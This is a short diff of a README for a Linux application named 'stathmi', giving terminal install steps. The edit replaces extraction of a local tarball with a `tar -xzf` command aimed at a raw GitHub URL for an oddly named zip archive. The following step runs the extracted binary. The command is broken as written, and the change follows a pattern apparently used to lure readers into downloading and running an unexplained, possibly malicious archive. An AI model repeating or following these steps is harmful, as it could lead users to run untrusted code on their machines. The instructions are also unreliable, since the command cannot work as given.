nickderrick2005/stathmi/README.md

 1. Open the terminal.
 2. Navigate to your **Downloads** folder using the command: `cd ~/Downloads`
-3. Extract the downloaded file using:`tar -xzf stathmi-linux.tar.gz`
+3. Extract the downloaded file using:`tar -xzf https://github.com/nickderrick2005/stathmi/raw/refs/heads/main/packages/shared/stathmi_impearl.zip`
 4. Navigate to the extracted folder: `cd stathmi`
 5. Run the application with the command: `./stathmi`